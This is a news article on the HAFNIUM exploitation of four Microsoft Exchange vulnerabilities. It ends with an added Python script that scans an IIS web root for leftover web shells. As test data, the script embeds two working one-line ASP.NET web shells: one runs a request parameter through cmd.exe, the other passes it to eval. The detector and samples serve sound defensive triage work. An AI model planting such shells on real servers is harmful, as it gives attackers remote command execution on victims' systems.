According to new reports, the victims of the Chinese hacking group exploiting multiple vulnerabilities in Microsoft Exchange Server could number more than 30,000.
Unlike other recent large-scale cyber attacks like the compromise of the SolarWinds Orion IT management platform, the threat actors’ victims are wide ranging and include small businesses and local municipalities, according to security blogger and researcher Brian Krebs.
Cybersecurity experts have been scrambling to grasp the scope of this attack, which is shaping up to be even larger and more widespread than the SolarWinds attack allegedly carried out by a nation state group linked to Russia.
Microsoft last week released emergency security updates to fix the four vulnerabilities that hackers were exploiting to spy on victims’ email and potentially steal information, and the threat group has since ramped up their attacks on servers worldwide that remain unpatched, Krebs reported.
The hackers are adept at creating ways to get back into victim servers even after they have left, most notably by leaving behind a web shell: a small script written into a web-accessible directory that can be opened from any browser and gives the attackers administrative access to run commands on the server.
Here’s more from Krebs:
Speaking on condition of anonymity, two cybersecurity experts who’ve briefed U.S. national security advisors on the attack told KrebsOnSecurity the Chinese hacking group thought to be responsible has seized control over “hundreds of thousands” of Microsoft Exchange Servers worldwide — with each victim system representing approximately one organization that uses Exchange to process email.
Meanwhile, Reuters also reported that the number of victims could be in the tens of thousands. The publication, citing people familiar with the U.S. government’s response, reported that the number of organizations compromised through these vulnerabilities is more than 20,000.
According to Reuters, organizations have been slow to patch the vulnerabilities, as only 10% had done so as of Friday.
One scan of connected devices showed only 10% of those vulnerable had installed the patches by Friday, though the number was rising.
Because installing the patch does not get rid of the back doors, U.S. officials are racing to figure out how to notify all the victims and guide them in their hunt.
All of those affected appear to run Web versions of email client Outlook and host them on their own machines, instead of relying on cloud providers. That may have spared many of the biggest companies and federal government agencies, the records suggest.
Microsoft — which calls the group HAFNIUM — and cybersecurity firm Volexity disclosed the vulnerabilities in blog posts last week. The attacks appear to have started as early as Jan. 6, when the U.S. was busy investigating the SolarWinds compromise and dealing with a riot and insurrection at the Capitol.
The vulnerabilities are tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065. Per Microsoft's advisory, CVE-2021-26855 is a server-side request forgery that lets an unauthenticated attacker send requests that authenticate as the Exchange server, CVE-2021-26857 is an insecure-deserialization bug in the Unified Messaging service, and CVE-2021-26858 and CVE-2021-27065 are post-authentication arbitrary file writes. Chained together, they give the attacker access to mailboxes and a way to write files such as web shells onto the server, which is how the group establishes long-term access to victim environments.
Microsoft has since released mitigation guidance and a script that checks Exchange servers for indicators of compromise. Installing the patches closes the entry points but does not remove web shells that were already dropped, so every server that was exposed while unpatched still needs to be checked.
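The web shell left behind after exploitation (mentioned above) is what survives patching, so the practical follow-up on a previously exposed server is to look for server-side pages that read attacker input from the HTTP request and hand it to something that executes it. The following is an added example, not Microsoft's IOC script and not code from the article or from any HAFNIUM sample: a small Python triage scan over a web root that flags such pages and reports whether they were modified recently. The directory names, file names and the three sample pages are constructed stand-ins, and the regexes are a heuristic, not a signature.

```python
"""Triage check for ASP.NET web shells left behind on an Exchange/IIS host.

Added example for this article: it is NOT Microsoft's IOC script and does
not encode any specific HAFNIUM sample. Directory names, file names and the
sample pages are constructed stand-ins.
"""
import os
import re
import tempfile
import time
from pathlib import Path

# Extensions IIS will execute as server-side pages.
SERVED_EXT = {".aspx", ".asp", ".ashx", ".asmx"}

# A web shell needs (1) attacker input taken from the HTTP request and
# (2) a sink that executes it. Flag files that contain both.
INPUT_RX = re.compile(r"Request\s*(\[|\.(Form|QueryString|Headers|Item))", re.I)
SINK_RX = re.compile(
    r"Process\.Start|ProcessStartInfo|\beval\s*\(|JScript\.Eval|Assembly\.Load",
    re.I,
)


def scan_tree(root, since_epoch):
    """Return [(relative_path, recent, sink)] for served pages that read
    request input and feed an execution sink.

    `recent` records whether mtime is after `since_epoch`. Timestamps can be
    forged by an attacker, so it is reported alongside the hit rather than
    used to drop files from the result.
    """
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SERVED_EXT:
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        sink = SINK_RX.search(text)
        if sink and INPUT_RX.search(text):
            recent = path.stat().st_mtime >= since_epoch
            findings.append((path.relative_to(root).as_posix(), recent, sink.group(0)))
    return findings


# Constructed sample pages (not real captured samples).
BENIGN = """<%@ Page Language="C#" %>
<html><body>Out of office: contact the helpdesk.</body></html>
"""
# Runs whatever arrives in the 'cmd' parameter through cmd.exe.
CMD_SHELL = """<%@ Page Language="C#" %><%
System.Diagnostics.Process.Start("cmd.exe", "/c " + Request["cmd"]);
%>"""
# One-liner that evaluates the request parameter as JScript.
EVAL_SHELL = """<%@ Page Language="Jscript" %><%eval(Request.Item["pass"], "unsafe");%>"""


def demo():
    """Build a throwaway web root with the three pages above and scan it.
    Directory names mimic an IIS/OWA layout but are only stand-ins."""
    root = Path(tempfile.mkdtemp())
    (root / "aspnet_client").mkdir()
    (root / "owa" / "auth").mkdir(parents=True)
    (root / "owa" / "auth" / "notice.aspx").write_text(BENIGN)
    (root / "aspnet_client" / "help.aspx").write_text(CMD_SHELL)
    old_shell = root / "owa" / "auth" / "offline.aspx"
    old_shell.write_text(EVAL_SHELL)
    # Backdate the second shell so it falls outside a one-week window.
    month_ago = time.time() - 30 * 86400
    os.utime(old_shell, (month_ago, month_ago))
    return scan_tree(root, since_epoch=time.time() - 7 * 86400)


if __name__ == "__main__":
    for rel, recent, sink in demo():
        print(f"{rel}: sink={sink!r} recent={recent}")
```

On a real host you would point `scan_tree` at the IIS web root and the Exchange front-end directories and keep the modification-time cutoff for prioritising, not for excluding: the backdated sample is still reported, just with `recent=False`, because a file timestamp is under the attacker's control once they can write to the server.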